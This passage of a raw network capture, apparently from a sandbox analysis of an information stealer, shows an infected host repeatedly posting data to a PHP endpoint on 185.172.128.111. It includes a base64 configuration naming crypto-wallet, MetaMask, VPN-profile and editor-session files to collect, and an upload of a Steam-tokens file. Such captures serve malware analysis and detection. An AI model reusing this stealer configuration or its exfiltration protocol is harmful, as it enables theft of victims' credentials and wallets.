------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="message"files------KJEHDHIEGIIIDHIDHDHJ--
Apr 23, 2024 09:27:13.939325094 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU1GS
Apr 23, 2024 09:27:13.978750944 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:14.445028067 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:14.460396051 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:14.878384113 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:14.890016079 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCF Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:15.405318975 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:15.412458897 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCG Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:15.996154070 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:16.002700090 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:16.557554960 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:16.563255072 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEG Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:16.975718975 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:16.984859943 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:17.559875011 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:17.570638895 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEG Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:18.026632071 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:18.032757044 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:18.570127010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:18.587354898 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEG Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:19.062275887 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:19.077807903 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:19.529674053 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:19.534996033 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:19.982554913 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:20.025444031 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:20.539647102 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:20.543704987 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:20.990396023 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:20.996401072 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:21.511964083 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:21.517654896 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:21.933883905 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:21.939445972 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:22.384622097 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:22.389317036 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:22.835299015 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:22.841672897 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:23.294435978 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:23.300975084 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHIJEBKEBGHIDHJKJEG Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:23.720346928 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:23.727741957 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHJEGIEBFIJJKFIIIJ Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:24.196125984 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:24.205318928 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCB Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:24.646919012 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:24.654324055 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK Host: 185.172.128.111 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:25.115422010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:25.121223927 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:25.590645075 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:25.597265005 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:26.074754953 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:26.084469080 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:26.526983976 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:26.531729937 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:26.985007048 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:26.990128040 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:27.469919920 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:28.501147032 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:29.021476984 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:29.026726007 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:29.496275902 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:29.501514912 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:29.989531994 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:29.995634079 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:30.448621988 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:30.455625057 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:30.916188955 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:30.921828985 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEBAAECBGDHIECAKJ Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:31.392280102 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:31.398389101 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:31.858278990 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:31.872809887 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFB Host: 185.172.128.111 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:32.292371988 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:32.312380075 CEST	565	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC Host: 185.172.128.111 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 2d 2d 0d 0a Data Ascii: ------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="file"------HJKECAAAFHJECAAAEBFC--
Apr 23, 2024 09:27:32.647715092 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:32.732286930 CEST	205	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF Host: 185.172.128.111 Content-Length: 121991 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:33.571419954 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
